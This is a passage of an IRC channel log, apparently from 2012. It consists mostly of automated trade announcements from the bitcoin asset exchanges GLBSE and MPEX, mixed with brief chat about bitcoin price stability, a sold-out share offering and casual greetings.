11 05:18:09 [GLBSE] [PPT.B] 22 @ 1.07 = 23.54 BTC [+] Aug 11 05:19:34 [GLBSE] [PPT.A] 4 @ 1.12 = 4.48 BTC [-] Aug 11 05:19:36 [GLBSE] [PPT.A] 15 @ 1.12999998 = 16.95 BTC [+] Aug 11 05:20:28 [GLBSE] [HYDRO.BONDS] 12 @ 1.325 = 15.9 BTC [+] Aug 11 05:21:09 sudden price upswings tend to draw in speculators, sudden price drops tend to scare away merchants, neither of these is actually desirable Aug 11 05:21:09 [GLBSE] [OBSI.1MHS] 3 @ 0.1 = 0.3 BTC [+] Aug 11 05:21:23 bitcoin'd do a lot better on a slow appreciation year after year. Aug 11 05:23:12 [GLBSE] [PPT.B] 17 @ 1.07 = 18.19 BTC [+] Aug 11 05:23:43 I was thinking so too Aug 11 05:24:06 I wanted bitcoins to stagnate around 5 USD for much long, and maybe slowly go toward 6 USD Aug 11 05:24:17 the way things are we'll end up with an argentine-type crisis. textbook example. Aug 11 05:29:53 [MPEX] [S.MPOE] 30400 @ 0.00033229 = 10.1016 BTC [+] Aug 11 05:33:37 [GLBSE] [BITCOINRS] 10 @ 0.05 = 0.5 BTC [+] Aug 11 05:34:39 [GLBSE] [GIGAMINING] 12 @ 1.14099999 = 13.692 BTC [+] Aug 11 05:34:41 [GLBSE] [GIGAMINING] 10 @ 1.14109999 = 11.411 BTC [+] Aug 11 05:35:49 [GLBSE] [PPT.B] 60 @ 1.07 = 64.2 BTC [+] Aug 11 05:35:50 [GLBSE] [PPT.B] 100 @ 1.0725 = 107.25 BTC [+] Aug 11 05:35:51 [GLBSE] [PPT.B] 65 @ 1.075 = 69.875 BTC [+] Aug 11 05:36:14 [GLBSE] [PPT.B] 2 @ 1.075 = 2.15 BTC [+] Aug 11 05:36:15 [GLBSE] [TYGRR.BOND-P] 5 @ 1.03 = 5.15 BTC [+] Aug 11 05:37:55 [GLBSE] [GOLD] 100 @ 0.01 = 1 BTC [+] Aug 11 05:38:19 [GLBSE] [PLATINUM] 29 @ 0.0091001 = 0.2639 BTC [-] Aug 11 05:43:26 [GLBSE] [TYGRR.BOND-P] 195 @ 1.03 = 200.85 BTC [+] Aug 11 05:43:28 [GLBSE] [TYGRR.BOND-P] 105 @ 1.035 = 108.675 BTC [+] Aug 11 05:47:52 [GLBSE] [TYGRR.BOND-PI] 50 @ 1.62 = 81 BTC [-] Aug 11 05:52:20 [GLBSE] [STANDARD.GOLD] 1000 @ 0.0001 = 0.1 BTC [-] Aug 11 05:53:23 [GLBSE] [STANDARD.FIAT] 1000 @ 0.0001 = 0.1 BTC [+] Aug 11 05:59:02 [GLBSE] [PPT.B] 4 @ 1.07 = 4.28 BTC [-] Aug 11 06:02:12 [GLBSE] [FOO.PPPPT] 1 @ 1.015 BTC [+] Aug 11 06:04:07 [GLBSE] [PPT.B] 2 @ 1.07 = 2.14 BTC [-] Aug 11 06:06:42 [GLBSE] [JAH] 4 @ 0.18 = 0.72 BTC [-] Aug 11 06:07:35 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC Aug 11 06:15:23 [GLBSE] [STANDARD.GOLD] 10000 @ 0.00005 = 0.5 BTC [-] Aug 11 06:21:23 [GLBSE] [PPT.B] 55 @ 1.07 = 58.85 BTC [-] Aug 11 06:23:48 [GLBSE] [PPT.B] 5 @ 1.072 = 5.36 BTC [+] Aug 11 06:24:29 [GLBSE] [TYGRR.BOND-B] 1 @ 0.0979 BTC [-] Aug 11 06:24:30 [GLBSE] [TYGRR.BOND-B] 10 @ 0.098 = 0.98 BTC [+] Aug 11 06:27:16 [MPEX] [S.MPOE] 24700 @ 0.00033229 = 8.2076 BTC [+] Aug 11 06:30:10 [GLBSE] [PPT.B] 48 @ 1.072 = 51.456 BTC [+] Aug 11 06:30:12 [GLBSE] [ARS] 50 @ 0.009 = 0.45 BTC [-] Aug 11 06:35:55 [GLBSE] [TYGRR.BOND-B] 2 @ 0.098 = 0.196 BTC [+] Aug 11 06:40:22 [GLBSE] [ASICMINER] 9 @ 0.1 = 0.9 BTC Aug 11 06:44:12 [GLBSE] [DI.BFLSC.SUCCEED] 3 @ 0.001 = 0.003 BTC Aug 11 06:45:02 [GLBSE] [BBBB] 1 @ 0.00027 BTC [-] Aug 11 06:45:23 [GLBSE] [BBBB] 1 @ 0.00027 BTC [-] Aug 11 06:45:45 [MPEX] [F.GIGA.ETF] 7500 @ 0.00113068 = 8.4801 BTC [+] Aug 11 06:46:23 [MPEX] [S.MPOE] 27633 @ 0.00033152 = 9.1609 BTC [-] Aug 11 06:51:05 [MPEX] [O.BTCUSD.C090T] 3 @ 0.25070019 = 0.7521 BTC [-] Aug 11 06:55:05 [GLBSE] [THUNDERCM.MIF.SHARES] 1 @ 0.47994 BTC [-] Aug 11 06:56:16 [GLBSE] [OBSI.HRPT] 4 @ 0.1095 = 0.438 BTC [-] Aug 11 06:56:51 [GLBSE] [TYGRR.BOND-P] 2 @ 1.0211 = 2.0422 BTC [-] Aug 11 06:58:10 [GLBSE] [OBSI.HRPT] 19 @ 0.1095 = 2.0805 BTC [-] Aug 11 07:01:46 [MPEX] [O.BTCUSD.C200T] 34 @ 0.02765418 = 0.9402 BTC [-] Aug 11 07:01:47 [MPEX] [O.BTCUSD.C200T] 48 @ 0.01624682 = 0.7798 BTC [-] Aug 11 07:01:48 [MPEX] [O.BTCUSD.C200T] 918 @ 0.00095885 = 0.8802 BTC [-] Aug 11 07:04:43 [GLBSE] [PPT.B] 47 @ 1.072 = 50.384 BTC [+] Aug 11 07:06:38 [GLBSE] [PPT.B] 46 @ 1.074 = 49.404 BTC [+] Aug 11 07:08:00 [GLBSE] [FOO.PPPPT] 45 @ 1.015 = 45.675 BTC [+] Aug 11 07:16:17 [GLBSE] [TYGRR.BOND-P] 4 @ 1.0211 = 4.0844 BTC [-] Aug 11 07:16:19 [GLBSE] [TYGRR.BOND-P] 1 @ 1.021 BTC [-] Aug 11 07:18:43 [GLBSE] [OBSI.HRPT] 37 @ 0.1095 = 4.0515 BTC [-] Aug 11 07:18:44 [GLBSE] [OBSI.HRPT] 8 @ 0.1097 = 0.8776 BTC [+] Aug 11 07:19:33 [GLBSE] [OBSI.HRPT] 1 @ 0.1097 BTC [+] Aug 11 07:32:00 [GLBSE] [BIB.PIRATE] 1 @ 1.0249999 BTC [+] Aug 11 07:33:46 [MPEX] [O.BTCUSD.P080T] 3 @ 0.02689559 = 0.0807 BTC [+] Aug 11 07:35:30 [GLBSE] [TYGRR.BOND-P] 1 @ 1.03879999 BTC [+] Aug 11 07:36:52 [MPEX] [O.BTCUSD.P070T] 3 @ 0.02672981 = 0.0802 BTC [+] Aug 11 07:43:21 [GLBSE] [TYGRR.BOT] 14 @ 1.05 = 14.7 BTC [+] Aug 11 07:44:48 [GLBSE] [PPT.A] 5 @ 1.1101 = 5.5505 BTC [-] Aug 11 07:44:50 [GLBSE] [PPT.A] 17 @ 1.11 = 18.87 BTC [-] Aug 11 07:54:15 [GLBSE] [MOVETO.FUND] 1 @ 1.07 BTC [-] Aug 11 08:01:08 [MPEX] [F.GIGA.ETF] 692 @ 0.00113068 = 0.7824 BTC [+] Aug 11 08:01:09 [MPEX] [F.GIGA.ETF] 1459 @ 0.00113271 = 1.6526 BTC [+] Aug 11 08:12:32 [GLBSE] [TYGRR.BOND-B] 86 @ 0.098 = 8.428 BTC [+] Aug 11 08:12:34 [GLBSE] [TYGRR.BOND-B] 5 @ 0.0999999 = 0.5 BTC [+] Aug 11 08:12:35 [GLBSE] [TYGRR.BOND-B] 1893 @ 0.1 = 189.3 BTC [+] Aug 11 08:12:36 [GLBSE] [TYGRR.BOND-B] 10 @ 0.1 = 1 BTC [+] Aug 11 08:15:25 [GLBSE] [GIGAMINING] 4 @ 1.1201 = 4.4804 BTC [-] Aug 11 08:15:27 [GLBSE] [GIGAMINING] 13 @ 1.12 = 14.56 BTC [-] Aug 11 08:16:52 [GLBSE] [TYGRR.BOND-P] 1 @ 1.03879999 BTC [+] Aug 11 08:18:14 [GLBSE] [ABM] 2 @ 0.1611 = 0.3222 BTC Aug 11 08:18:15 [GLBSE] [ABM] 3 @ 0.161 = 0.483 BTC [-] Aug 11 08:28:58 [GLBSE] [PPT.B] 22 @ 1.074 = 23.628 BTC [+] Aug 11 08:29:29 [GLBSE] [GIGAMINING] 4 @ 1.1201 = 4.4804 BTC [+] Aug 11 08:29:31 [GLBSE] [GIGAMINING] 5 @ 1.12 = 5.6 BTC [-] Aug 11 08:29:32 [GLBSE] [GIGAMINING] 8 @ 1.11050001 = 8.884 BTC [-] Aug 11 08:31:38 [GLBSE] [OBSI.HRPT] 1 @ 0.10949 BTC [-] Aug 11 08:32:03 [GLBSE] [TYGRR.BOND-B] 6 @ 0.1 = 0.6 BTC [+] Aug 11 08:32:41 [GLBSE] [FPGA.CONTRACT] 4 @ 0.1699 = 0.6796 BTC [+] Aug 11 08:34:10 [GLBSE] [RAREEARTH] 11 @ 0.00926001 = 0.1019 BTC [-] Aug 11 08:34:11 [GLBSE] [RAREEARTH] 2 @ 0.00926 = 0.0185 BTC [-] Aug 11 08:53:41 [MPEX] [S.MPOE] 2762 @ 0.00031581 = 0.8723 BTC [-] Aug 11 08:53:42 [MPEX] [S.MPOE] 3871615 @ 0.00033229 = 1286.4989 BTC [+] Aug 11 08:57:06 [MPEX] [F.GIGA.ETF] 3449 @ 0.00114691 = 3.9557 BTC [+] Aug 11 08:58:05 [MPEX] [F.GIGA.ETF] 15090 @ 0.001135 = 17.1272 BTC [-] Aug 11 09:35:32 [MPEX] [S.MPOE] 26900 @ 0.00025 = 6.725 BTC [-] Aug 11 10:00:07 [GLBSE] [BIB.PIRATE] 3 @ 0.9901 = 2.9703 BTC [-] Aug 11 10:00:08 [GLBSE] [BIB.PIRATE] 3 @ 0.99 = 2.97 BTC [-] Aug 11 10:00:44 [MPEX] [S.MPOE] 46756 @ 0.0002717 = 12.7036 BTC [+] Aug 11 10:01:07 [MPEX] [S.MPOE] 25544 @ 0.0002717 = 6.9403 BTC [+] Aug 11 10:01:09 [MPEX] [S.MPOE] 15700 @ 0.00029286 = 4.5979 BTC [+] Aug 11 10:01:10 [MPEX] [S.MPOE] 3043534 @ 0.00033229 = 1011.3359 BTC [+] Aug 11 10:01:10 [MPEX] [S.MPOE] 41336 @ 0.0003323 = 13.736 BTC [+] Aug 11 10:01:12 [MPEX] [S.MPOE] 50801 @ 0.00033347 = 16.9406 BTC [+] Aug 11 10:01:13 [MPEX] [S.MPOE] 50324 @ 0.00033441 = 16.8288 BTC [+] Aug 11 10:01:14 [MPEX] [S.MPOE] 58361 @ 0.00033516 = 19.5603 BTC [+] Aug 11 10:01:15 [MPEX] [S.MPOE] 62681 @ 0.00033572 = 21.0433 BTC [+] Aug 11 10:01:16 [MPEX] [S.MPOE] 38534 @ 0.0003358 = 12.9397 BTC [+] Aug 11 10:01:17 [MPEX] [S.MPOE] 29420 @ 0.0003361 = 9.8881 BTC [+] Aug 11 10:01:18 [MPEX] [S.MPOE] 28511 @ 0.00033632 = 9.5888 BTC [+] Aug 11 10:01:19 [MPEX] [S.MPOE] 28639 @ 0.00033648 = 9.6365 BTC [+] Aug 11 10:01:20 [MPEX] [S.MPOE] 13967 @ 0.00033651 = 4.7 BTC [+] Aug 11 10:01:21 [MPEX] [S.MPOE] 31196 @ 0.0003375 = 10.5287 BTC [+] Aug 11 10:01:22 [MPEX] [S.MPOE] 3991 @ 0.00033778 = 1.3481 BTC [+] Aug 11 10:01:23 [MPEX] [S.MPOE] 32151 @ 0.00033785 = 10.8622 BTC [+] Aug 11 10:01:24 [MPEX] [S.MPOE] 69741 @ 0.00033809 = 23.5787 BTC [+] Aug 11 10:01:25 [MPEX] [S.MPOE] 17735 @ 0.00033946 = 6.0203 BTC [+] Aug 11 10:01:26 [MPEX] [S.MPOE] 38717 @ 0.00033949 = 13.144 BTC [+] Aug 11 10:01:27 [MPEX] [S.MPOE] 48689 @ 0.00033951 = 16.5304 BTC [+] Aug 11 10:01:28 [MPEX] [S.MPOE] 11355 @ 0.00033954 = 3.8555 BTC [+] Aug 11 10:01:29 [MPEX] [S.MPOE] 16686 @ 0.00034012 = 5.6752 BTC [+] Aug 11 10:01:29 [MPEX] [S.MPOE] 38084 @ 0.00034145 = 13.0038 BTC [+] Aug 11 10:01:30 [MPEX] [S.MPOE] 69370 @ 0.00034164 = 23.6996 BTC [+] Aug 11 10:01:31 [MPEX] [S.MPOE] 48557 @ 0.0003435 = 16.6793 BTC [+] Aug 11 10:01:32 [MPEX] [S.MPOE] 3219 @ 0.0003437 = 1.1064 BTC [+] Aug 11 10:01:33 [MPEX] [S.MPOE] 63670 @ 0.00034391 = 21.8967 BTC [+] Aug 11 10:01:34 [MPEX] [S.MPOE] 19487 @ 0.00034392 = 6.702 BTC [+] Aug 11 10:02:37 [MPEX] [F.GIGA.ETF] 1698 @ 0.00112563 = 1.9113 BTC [-] Aug 11 10:02:38 [MPEX] [F.GIGA.ETF] 909 @ 0.00110681 = 1.0061 BTC [-] Aug 11 10:04:22 [MPEX] [S.MPOE] 33343 @ 0.00034392 = 11.4673 BTC [+] Aug 11 10:06:18 [GLBSE] [BITBOND] 1 @ 0.399 BTC [-] Aug 11 10:11:42 [MPEX] [S.MPOE] 17500 @ 0.00030718 = 5.3757 BTC [-] Aug 11 10:14:02 [GLBSE] [FPGAMINING] 1 @ 0.86 BTC [+] Aug 11 10:28:34 [GLBSE] [CPA] 20 @ 0.10296 = 2.0592 BTC [+] Aug 11 10:31:06 [GLBSE] [MERGEDMINING] 5 @ 0.09 = 0.45 BTC [-] Aug 11 10:47:58 [GLBSE] [FOO.PPPPT] 18 @ 1.015 = 18.27 BTC [+] Aug 11 10:48:06 [GLBSE] [MOVETO.FUND] 1 @ 1.07 BTC [-] Aug 11 10:56:48 [GLBSE] [HYDRO.BONDS] 2 @ 1.325 = 2.65 BTC [+] Aug 11 11:00:19 [GLBSE] [BIB.BVPS] 20 @ 0.0044 = 0.088 BTC [-] Aug 11 11:12:23 [MPEX] [F.GIGA.ETF] 8293 @ 0.00110088 = 9.1296 BTC [-] Aug 11 11:15:09 [MPEX] [S.BVPS] 500 @ 0.00260032 = 1.3002 BTC [+] Aug 11 11:15:27 [GLBSE] [HYDRO.BONDS] 18 @ 1.325 = 23.85 BTC [+] Aug 11 11:15:29 [GLBSE] [HYDRO.BONDS] 3 @ 1.39999 = 4.2 BTC [+] Aug 11 11:15:45 [MPEX] [S.BVPS] 968 @ 0.00276488 = 2.6764 BTC [+] Aug 11 11:20:23 [GLBSE] [PGM] 70 @ 0.25 = 17.5 BTC [-] Aug 11 11:27:00 [GLBSE] [SILVER] 100 @ 0.01 = 1 BTC [+] Aug 11 11:43:44 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC Aug 11 12:00:43 [GLBSE] [SS] 1 @ 1.9 BTC [-] Aug 11 12:11:31 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC Aug 11 12:27:10 [GLBSE] [BTCS] 27 @ 0.01 = 0.27 BTC [+] Aug 11 12:30:30 [GLBSE] [TYGRR.BOND-P] 2 @ 1.03879999 = 2.0776 BTC [+] Aug 11 12:34:14 [GLBSE] [GIGAMINING] 6 @ 1.14099999 = 6.846 BTC [+] Aug 11 12:46:19 [GLBSE] [YABMC] 43 @ 0.1217 = 5.2331 BTC [+] Aug 11 12:46:59 [GLBSE] [ASICMINER] 43 @ 0.1 = 4.3 BTC Aug 11 12:47:58 [GLBSE] [NASTY] 4 @ 0.54989999 = 2.1996 BTC [+] Aug 11 12:51:43 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC Aug 11 12:53:04 [GLBSE] [GIGAMINING] 2 @ 1.14099999 = 2.282 BTC [+] Aug 11 12:55:00 [GLBSE] [TEEK.A] 2 @ 0.98 = 1.96 BTC Aug 11 12:56:18 [GLBSE] [YABMC] 5 @ 0.1201 = 0.6005 BTC [-] Aug 11 12:57:14 [GLBSE] [YABMC] 8 @ 0.122 = 0.976 BTC [+] Aug 11 12:58:24 [GLBSE] [ASICMINER] 1302 @ 0.1 = 130.2 BTC Aug 11 13:00:00 [GLBSE] [MOORE] 6 @ 0.5129 = 3.0774 BTC [-] Aug 11 13:00:01 [GLBSE] [MOORE] 4 @ 0.513 = 2.052 BTC [+] Aug 11 13:03:22 [GLBSE] [COGNITIVE] 2 @ 0.7099 = 1.4198 BTC [+] Aug 11 13:11:39 [GLBSE] [GOLD] 59 @ 0.01 = 0.59 BTC [+] Aug 11 13:20:22 [GLBSE] [BITCOINTORRENTZ] 1 @ 0.51 BTC [-] Aug 11 13:20:23 [GLBSE] [BITCOINTORRENTZ] 3 @ 0.5 = 1.5 BTC [-] Aug 11 13:21:11 [GLBSE] [M.ETF] 4 @ 0.141 = 0.564 BTC [-] Aug 11 13:23:26 [GLBSE] [BITBOND] 1 @ 0.38 BTC [-] Aug 11 13:23:28 [GLBSE] [BITBOND] 6 @ 0.37118 = 2.2271 BTC [-] Aug 11 13:23:29 [GLBSE] [BITBOND] 38 @ 0.3702 = 14.0676 BTC [-] Aug 11 13:23:31 [GLBSE] [BITBOND] 10 @ 0.37 = 3.7 BTC [-] Aug 11 13:24:37 [GLBSE] [YABMC] 15 @ 0.1201 = 1.8015 BTC [-] Aug 11 13:24:38 [GLBSE] [YABMC] 5 @ 0.12 = 0.6 BTC [-] Aug 11 13:26:14 [GLBSE] [PPT.B] 60 @ 1.073 = 64.38 BTC [-] Aug 11 13:26:15 [GLBSE] [PPT.B] 13 @ 1.074 = 13.962 BTC [+] Aug 11 13:26:17 [GLBSE] [PPT.B] 33 @ 1.075 = 35.475 BTC [+] Aug 11 13:26:17 [GLBSE] [PPT.B] 128 @ 1.076 = 137.728 BTC [+] Aug 11 13:27:40 [GLBSE] [PPT.B] 71 @ 1.079 = 76.609 BTC [+] Aug 11 13:27:44 [GLBSE] [PUREMINING] 15 @ 0.13121 = 1.9682 BTC [-] Aug 11 13:27:45 [GLBSE] [PUREMINING] 3 @ 0.13111 = 0.3933 BTC [-] Aug 11 13:27:47 [GLBSE] [PUREMINING] 1 @ 0.13031 BTC [-] Aug 11 13:27:47 [GLBSE] [PUREMINING] 10 @ 0.1302 = 1.302 BTC [-] Aug 11 13:28:38 [GLBSE] [PUREMINING] 23 @ 0.12500001 = 2.875 BTC [-] Aug 11 13:48:17 [MPEX] [S.MPOE] 11091 @ 0.00034392 = 3.8144 BTC [+] Aug 11 13:51:58 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.2 BTC [-] Aug 11 13:55:34 All GIPPT have been sold :D Aug 11 13:56:43 reminds me of Egypt Aug 11 13:59:19 what reminds you of Egypt? :P Aug 11 13:59:38 gippt. Aug 11 14:00:01 [GLBSE] [GIGAMINING] 4 @ 1.1112 = 4.4448 BTC [-] Aug 11 14:00:22 [MPEX] [S.MPOE] 7226 @ 0.00034392 = 2.4852 BTC [+] Aug 11 14:00:23 [MPEX] [S.MPOE] 12974 @ 0.00034416 = 4.4651 BTC [+] Aug 11 14:00:45 good work DeaDTerra Aug 11 14:01:57 [GLBSE] [GIGAMINING] 6 @ 1.1111 = 6.6666 BTC [-] Aug 11 14:02:50 oh xD Aug 11 14:02:58 Never been in Egypt so I wouldn't know Aug 11 14:03:00 Thanks ) Aug 11 14:03:02 :)* Aug 11 14:03:43 [GLBSE] [FOO.PPPPT] 19 @ 1.015 = 19.285 BTC [+] Aug 11 14:04:37 [GLBSE] [FOO.PPPPT] 9 @ 1.02 = 9.18 BTC [+] Aug 11 14:06:58 [GLBSE] [YABMC] 15 @ 0.1162 = 1.743 BTC [-] Aug 11 14:06:59 [GLBSE] [YABMC] 5 @ 0.1161 = 0.5805 BTC [-] Aug 11 14:07:01 [GLBSE] [YABMC] 50 @ 0.116 = 5.8 BTC [-] Aug 11 14:07:02 [GLBSE] [YABMC] 7 @ 0.112 = 0.784 BTC [-] Aug 11 14:07:03 [GLBSE] [YABMC] 25 @ 0.11 = 2.75 BTC [-] Aug 11 14:09:04 [GLBSE] [ASICMINER] 29 @ 0.1 = 2.9 BTC Aug 11 14:10:08 [MPEX] [S.MPOE] 54551 @ 0.00034416 = 18.7743 BTC [+] Aug 11 14:10:10 [MPEX] [S.MPOE] 13249 @ 0.00034527 = 4.5745 BTC [+] Aug 11 14:11:26 [GLBSE] [SILVER] 970 @ 0.01 = 9.7 BTC [+] Aug 11 14:14:09 [GLBSE] [GOLD] 635 @ 0.01 = 6.35 BTC [+] Aug 11 14:15:20 [GLBSE] [PPT.B] 59 @ 1.079 = 63.661 BTC [+] Aug 11 14:18:11 [GLBSE] [TICKER] 22 @ 0.4 = 8.8 BTC [+] Aug 11 14:18:51 i been in egypt and it's pretty cool. Aug 11 14:34:03 [MPEX] [S.MPOE] 3600 @ 0.00034527 = 1.243 BTC [+] Aug 11 14:39:39 [GLBSE] [GIGAMINING] 4 @ 1.14099999 = 4.564 BTC [+] Aug 11 14:40:24 [GLBSE] [GIGAMINING] 2 @ 1.14099999 = 2.282 BTC [+] Aug 11 14:41:21 [GLBSE] [GIGAMINING] 1 @ 1.14109999 BTC [+] Aug 11 14:42:12 [MPEX] [S.MPOE] 39806 @ 0.00032454 = 12.9186 BTC [-] Aug 11 14:52:53 [GLBSE] [HYDRO.BONDS] 10 @ 1.6 = 16 BTC [+] Aug 11 14:58:12 [GLBSE] [FOO.PPPPT] 6 @ 1.02 = 6.12 BTC [+] Aug 11 15:02:17 [MPEX] [S.MPOE] 73100 @ 0.00025 = 18.275 BTC [-] Aug 11 15:03:53 [MPEX] [S.MPOE] 6100 @ 0.00023102 = 1.4092 BTC [-] Aug 11 15:03:53 [MPEX] [S.MPOE] 68302 @ 0.00028676 = 19.5863 BTC [+] Aug 11 15:03:55 [MPEX] [S.MPOE] 718 @ 0.00030629 = 0.2199 BTC [+] Aug 11 15:15:02 [GLBSE] [TYGRR.BOND-P] 2 @ 1.03879999 = 2.0776 BTC [+] Aug 11 15:15:04 [GLBSE] [TYGRR.BOND-P] 16 @ 1.03889999 = 16.6224 BTC [+] Aug 11 15:15:05 [GLBSE] [TYGRR.BOND-P] 6 @ 1.039 = 6.234 BTC [+] Aug 11 15:32:57 [GLBSE] [FPGA-EU] 2 @ 0.16 = 0.32 BTC [-] Aug 11 15:41:12 [MPEX] [F.GIGA.ETF] 3600 @ 0.001135 = 4.086 BTC [+] Aug 11 15:42:33 [GLBSE] [FOO.PPPPT] 2 @ 1.02 = 2.04 BTC [+] Aug 11 15:46:14 [GLBSE] [NASTY] 4 @ 0.54999999 = 2.2 BTC [+] Aug 11 15:46:16 [GLBSE] [NASTY] 96 @ 0.55 = 52.8 BTC [+] Aug 11 15:46:47 [GLBSE] [BIB.PIRATE] 2 @ 1.0001 = 2.0002 BTC [+] Aug 11 15:46:50 [GLBSE] [NASTY] 9 @ 0.55 = 4.95 BTC [+] Aug 11 15:49:26 [GLBSE] [PPT.D] 3 @ 1.2251 = 3.6753 BTC [-] Aug 11 15:50:56 [GLBSE] [FOO.PPPPT] 4 @ 1.02 = 4.08 BTC [+] Aug 11 15:59:06 [GLBSE] [BIB.PIRATE] 2 @ 1.0001 = 2.0002 BTC [+] Aug 11 15:59:58 [GLBSE] [HYDRO.BONDS] 4 @ 1.55 = 6.2 BTC [-] Aug 11 16:04:40 [GLBSE] [OBSI.HRPT] 4 @ 0.1079 = 0.4316 BTC [-] Aug 11 16:05:15 [GLBSE] [TYGRR.BOT] 1 @ 1.05 BTC [+] Aug 11 16:10:18 [GLBSE] [BIB.PIRATE] 1 @ 1.0001 BTC [+] Aug 11 16:10:20 [GLBSE] [BIB.PIRATE] 1 @ 1 BTC [-] Aug 11 16:15:06 [MPEX] [S.MPOE] 3939 @ 0.00034527 = 1.36 BTC [+] Aug 11 16:15:15 [MPEX] [S.MPOE] 36876 @ 0.000335 = 12.3535 BTC [-] Aug 11 16:17:56 [GLBSE] [TYGRR.BOND-P] 23 @ 1.039 = 23.897 BTC [+] Aug 11 16:20:59 [GLBSE] [BIB.PIRATE] 5 @ 1 = 5 BTC [-] Aug 11 16:39:46 [GLBSE] [FOO.PPPPT] 2 @ 1.0105 = 2.021 BTC [-] Aug 11 16:39:48 [GLBSE] [FOO.PPPPT] 3 @ 1.0104 = 3.0312 BTC [-] Aug 11 16:53:48 [MPEX] [F.GIGA.ETF] 10200 @ 0.001135 = 11.577 BTC [+] Aug 11 17:07:25 [GLBSE] [TEEK.USD] 1 @ 0.087 BTC [+] Aug 11 17:21:02 [GLBSE] [SILVER] 7 @ 0.01 = 0.07 BTC [+] Aug 11 17:21:26 hi Aug 11 17:22:22 [MPEX] [F.GIGA.ETF] 5900 @ 0.001135 = 6.6965 BTC [+] Aug 11 17:22:44 [GLBSE] [M.ETF] 6 @ 0.141 = 0.846 BTC [-] Aug 11 17:23:56 [GLBSE] [OBSI.HRPT] 8 @ 0.10789 = 0.8631 BTC [-] Aug 11 17:27:02 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC Aug 11 17:32:44 [MPEX] [S.MPOE] 31162 @ 0.00034527 = 10.7593 BTC [+] Aug 11 17:32:46 [MPEX] [S.MPOE] 15606 @ 0.00034558 = 5.3931 BTC [+] Aug 11 17:32:47 YARR has been paid! YARR -- slamming it home since 2012. Aug 11 17:34:30 (just trying out a new slogan, lemme know what you think~) Aug 11 17:35:11 [GLBSE] [OBSI.HRPT] 1 @ 0.105 BTC [-] Aug 11 17:35:12 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [-] Aug 11 17:35:13 [GLBSE] [OBSI.HRPT] 6 @ 0.1025 = 0.615 BTC [-] Aug 11 17:35:14 [GLBSE] [OBSI.HRPT] 4 @ 0.102 = 0.408 BTC [-] Aug 11 17:35:15 [GLBSE] [OBSI.HRPT] 9 @ 0.102 = 0.918 BTC [-] Aug 11 17:35:16 [GLBSE] [OBSI.HRPT] 68 @ 0.10102 = 6.8694 BTC [-] Aug 11 17:35:18 [GLBSE] [OBSI.HRPT] 11 @ 0.10102 = 1.1112 BTC [-] Aug 11 17:35:36 [GLBSE] [FPGAMINING] 10 @ 0.75 = 7.5 BTC [-] Aug 11 17:35:38 [GLBSE] [FPGAMINING] 1 @ 0.74 BTC [-] Aug 11 17:35:58 [GLBSE] [OBSI.HRPT] 1 @ 0.10102 BTC [-] Aug 11 17:36:00 [GLBSE] [OBSI.HRPT] 75 @ 0.10101 = 7.5758 BTC [-] Aug 11 17:36:01 [GLBSE] [OBSI.HRPT] 8 @ 0.101 = 0.808 BTC [-] Aug 11 17:36:03 [GLBSE] [OBSI.HRPT] 16 @ 0.101 = 1.616 BTC [-] Aug 11 17:36:36 [GLBSE] [FPGAMINING] 174 @ 0.84 = 146.16 BTC [+] Aug 11 17:38:01 hi goat Aug 11 17:39:20 [GLBSE] [YABMC] 25 @ 0.1199 = 2.9975 BTC [+] Aug 11 17:39:21 [GLBSE] [YABMC] 5 @ 0.12 = 0.6 BTC [+] Aug 11 17:42:29 usagi not so great. Aug 11 17:43:10 o_O Aug 11 17:43:18 Back to the drawing board. Aug 11 17:45:59 Hmm Diablo-D3 isn't here Aug 11 17:47:27 [GLBSE] [GIGAMINING] 3 @ 1.14099999 = 3.423 BTC [-] Aug 11 17:47:29 [GLBSE] [GIGAMINING] 5 @ 1.14109999 = 5.7055 BTC [+] Aug 11 17:47:39 nope he is probably eating like usual Aug 11 17:50:10 [GLBSE] [BIB.PIRATE] 1 @ 1.02489976 BTC [+] Aug 11 17:50:12 [GLBSE] [BIB.PIRATE] 1 @ 1.02498997 BTC [+] Aug 11 17:51:33 [GLBSE] [ASICMINER] 200 @ 0.1 = 20 BTC Aug 11 17:52:12 [GLBSE] [ASICMINER] 198 @ 0.1 = 19.8 BTC Aug 11 18:03:52 [GLBSE] [GIGAMINING] 4 @ 1.1301 = 4.5204 BTC [-] Aug 11 18:03:54 [GLBSE] [GIGAMINING] 10 @ 1.13 = 11.3 BTC [-] Aug 11 18:08:18 [GLBSE] [FPGAMINING] 750 @ 0.8401 = 630.075 BTC [+] Aug 11 18:13:56 [GLBSE] [ASICMINER] 726 @ 0.1 = 72.6 BTC Aug 11 18:20:15 [GLBSE] [BDT] 1 @ 1.0599 BTC [-] Aug 11 18:23:23 [GLBSE] [PUREMINING] 6 @ 0.146 = 0.876 BTC [+] Aug 11 18:25:31 [GLBSE] [FPGAMINING] 165 @ 0.8405 = 138.6825 BTC [+] Aug 11 18:29:43 [GLBSE] [FOO.PPPPT] 2 @ 1.0199 = 2.0398 BTC [+] Aug 11 18:29:44 [GLBSE] [FOO.PPPPT] 16 @ 1.02 = 16.32 BTC [+] Aug 11 18:29:50 [GLBSE] [FPGAMINING] 19 @ 0.8409 = 15.9771 BTC [+] Aug 11 18:31:26 [MPEX] [F.GIGA.ETF] 6200 @ 0.00113289 = 7.0239 BTC [-] Aug 11 18:31:28 [MPEX] [F.GIGA.ETF] 4200 @ 0.001135 = 4.767 BTC [+] Aug 11 18:32:44 [GLBSE] [ASICMINER] 11 @ 0.1 = 1.1 BTC Aug 11 18:36:12 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Aug 11 18:36:30 [GLBSE] [MOORE] 1 @ 0.5147 BTC [+] Aug 11 18:37:25 [GLBSE] [RAREEARTH] 7 @ 0.00926 = 0.0648 BTC [-] Aug 11 18:37:40 [MPEX] [S.MPOE] 25200 @ 0.00034558 = 8.7086 BTC [+] Aug 11 18:37:50 [GLBSE] [BTCWEB] 1 @ 0.1 BTC [+] Aug 11 18:39:47 [GLBSE] [CIUCIU.BOND] 1 @ 0.1 BTC Aug 11 18:41:42 [GLBSE] [FUTUREFUND] 1 @ 0.00011485 BTC [+] Aug 11 18:42:23 